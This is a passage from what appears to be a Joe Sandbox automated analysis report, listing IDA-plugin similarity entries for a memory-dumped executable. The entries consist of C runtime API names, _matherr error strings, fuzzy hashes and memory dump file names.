                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Byte$CharLeadMultiWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2561704868-0
                                                                                                                                                                                                                                      • Opcode ID: 393e6c5c3a1e5845fd4fc5ee744cc085087517d35f56047cd9ca296ef67b1d22
                                                                                                                                                                                                                                      • Instruction ID: f717ad62e6a915763771c6a2cb6c8050648672b2b69c37b673cb58791add5993
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 393e6c5c3a1e5845fd4fc5ee744cc085087517d35f56047cd9ca296ef67b1d22
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC3191B2A0C281CAE7709B25A4043B936D0FBA4794F9481F5EA98C77D5CF3CD985DB00
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memsetwcscpywcslen
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 3616488086-4108050209
                                                                                                                                                                                                                                      • Opcode ID: a2113daaead7763a2add9b9668c5bc286bd5f75af77c405c9a54322c48e30157
                                                                                                                                                                                                                                      • Instruction ID: 813c3d802999ccf44f1fc61e67c690d103963d25193a84b3616ec40950fe3281
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2113daaead7763a2add9b9668c5bc286bd5f75af77c405c9a54322c48e30157
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E110162A2869082E760D721E4043ABB6A0EFC47A4F900371FA9D87BD5DF3EC1468B40
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocCreateErrorLastSemaphoreabort
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4146797221-0
                                                                                                                                                                                                                                      • Opcode ID: 7ed4582e6cfc2eedc68ffde5b04e3b3758d5de061164d9ed7da4b154b13cc271
                                                                                                                                                                                                                                      • Instruction ID: 2724bf282d77f654814c5d3600fbe568a8ed6e78442f773efb0a99e3455e247f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ed4582e6cfc2eedc68ffde5b04e3b3758d5de061164d9ed7da4b154b13cc271
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32F01CB0E09A0786F774AB356B4943537E2EF49390F9002F5C81DC32F1EF2CA6459200
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_wgetenvwcscpywcslen
                                                                                                                                                                                                                                      • String ID: 99C
                                                                                                                                                                                                                                      • API String ID: 753804109-3786687225
                                                                                                                                                                                                                                      • Opcode ID: 630722e66aa89e864fabcbf00fddbdaab551133ad1f23f75926378ecb3cf0540
                                                                                                                                                                                                                                      • Instruction ID: b998078d0f86eef237674400b08f14a37305528e2e6623836d4424da8d24a980
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 630722e66aa89e864fabcbf00fddbdaab551133ad1f23f75926378ecb3cf0540
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E841D2A2A08B8685FB71CB26E44477A77E0EB59B94F4480B5EE8D87795EF3DD140C700
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: fprintf
                                                                                                                                                                                                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                                                      • API String ID: 383729395-3474627141
                                                                                                                                                                                                                                      • Opcode ID: 79dd460563d5a1093e8d951f514f1225439d89af9e0f4d298c37f5dcd8f35023
                                                                                                                                                                                                                                      • Instruction ID: 14c286f42cf67e0d577d5796ba56314b5e9812a99700421c15f39cdf4d38566f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79dd460563d5a1093e8d951f514f1225439d89af9e0f4d298c37f5dcd8f35023
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4001C262908E88C5D6268F1CE8051FAB3B4FF5E75AF645361EA8C67220DF29D643C700
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: fprintf
                                                                                                                                                                                                                                      • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                                                      • API String ID: 383729395-4064033741
                                                                                                                                                                                                                                      • Opcode ID: 5dcdf501f8d0c0d78b672e358af8105a88eb9d6e5a5ed3cda2d80ae3d40122af
                                                                                                                                                                                                                                      • Instruction ID: ff841cd52980efae7fa9837a434b7de25b6110bf51b0a6cbca9925e4eebd9ecf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5dcdf501f8d0c0d78b672e358af8105a88eb9d6e5a5ed3cda2d80ae3d40122af
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48F06252818F4885D6128F1CA4001FBB370FF5D799F685365EB8D67164DF28D643C700
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: fprintf
                                                                                                                                                                                                                                      • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                                                      • API String ID: 383729395-2187435201
                                                                                                                                                                                                                                      • Opcode ID: 57eeb79cd4f0b2dc4027a266efb26da0f7fc4c20b6a9d173aa8d348e7b14c023
                                                                                                                                                                                                                                      • Instruction ID: c7b1fc50e5dd0217cdd5a96cbc80487795d5e664ba2bec8fa0a4218e856737ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57eeb79cd4f0b2dc4027a266efb26da0f7fc4c20b6a9d173aa8d348e7b14c023
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ACF06252818F4885D2228F1CA4001FBB375FF5D799F585365EB8D67164DF28D643C700
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: fprintf
                                                                                                                                                                                                                                      • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                                                      • API String ID: 383729395-4273532761
                                                                                                                                                                                                                                      • Opcode ID: 38568af7201735c52b79fa0f35c1dd809b822f0fa833d1a51486900347d5e6b6
                                                                                                                                                                                                                                      • Instruction ID: 592ec97580908fd632a23eb99210c2f7ef93031bf776636f200e66acb77b61c6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38568af7201735c52b79fa0f35c1dd809b822f0fa833d1a51486900347d5e6b6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AF06252818F4885D2128F1CA8001FBB370FF5D799F585365EB8D67624DF28D6438700
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: fprintf
                                                                                                                                                                                                                                      • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                                                      • API String ID: 383729395-4283191376
                                                                                                                                                                                                                                      • Opcode ID: 95928504ff078c1d2e3c42a3fc65cd6db849bff2dbc220db9ec59e168a567e8e
                                                                                                                                                                                                                                      • Instruction ID: aaa41c8f2a94dd23ec7c2ec204f942c41fab8a60aef975d1c29238742940ca35
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95928504ff078c1d2e3c42a3fc65cd6db849bff2dbc220db9ec59e168a567e8e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12F06252818F4885D2128F1CA4001FBB370FF5D799F585365EB8D67164DF28D643C700
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: fprintf
                                                                                                                                                                                                                                      • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                                                      • API String ID: 383729395-2468659920
                                                                                                                                                                                                                                      • Opcode ID: 9b74fbfd760e2f08af4cc342425735ee6629a5717db67921eeb2ad025599fb8b
                                                                                                                                                                                                                                      • Instruction ID: f18518cb6542d38f5a1e38d7c2b53dc4cd78f987c109ec459e891c827e02ad7e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b74fbfd760e2f08af4cc342425735ee6629a5717db67921eeb2ad025599fb8b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7F06252818F4885D2218F1CA4041FBB370FF5D799F585366EB8D67124DF28D6438700
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: fprintf
                                                                                                                                                                                                                                      • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                                                      • API String ID: 383729395-2713391170
                                                                                                                                                                                                                                      • Opcode ID: 3115e7dada9010ebd3e19ac1b71b669bba03f88afe863013d6b0a881a04c3dc2
                                                                                                                                                                                                                                      • Instruction ID: 21adfda44a8698ff04aa6b0bf17de04431ffb41e47ccfda875e13f678f56f80e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3115e7dada9010ebd3e19ac1b71b669bba03f88afe863013d6b0a881a04c3dc2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45F06D56818F8886D2128F18A8001BBB360FF4E799F585366EF8C2A224DF28D6438700
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memsetwcscatwcscpywcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 468205783-0
                                                                                                                                                                                                                                      • Opcode ID: 0dc682289dbf7da38c2663837fbf556bca0a988e4e02d6b3a43a619d61269f36
                                                                                                                                                                                                                                      • Instruction ID: bf90d923dd5d10e1c21a71d793cb47a9852e03e3a0c5a1be6076a97a73efd226
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0dc682289dbf7da38c2663837fbf556bca0a988e4e02d6b3a43a619d61269f36
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D21A262A18B8585E771DF26E85837A76E0FB59B84F4881B5EE8C87791EF7CD080C300
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavefree
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4020351045-0
                                                                                                                                                                                                                                      • Opcode ID: 0e0decab636d231f7f1742a7203d3f4cc7ae845923e50379d15f1c7c98d0e1c4
                                                                                                                                                                                                                                      • Instruction ID: 3ad3c2cf37912c09a6e6f66d959acd2c8b5b86f071f5d6fdaa12f2c3d279d563
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e0decab636d231f7f1742a7203d3f4cc7ae845923e50379d15f1c7c98d0e1c4
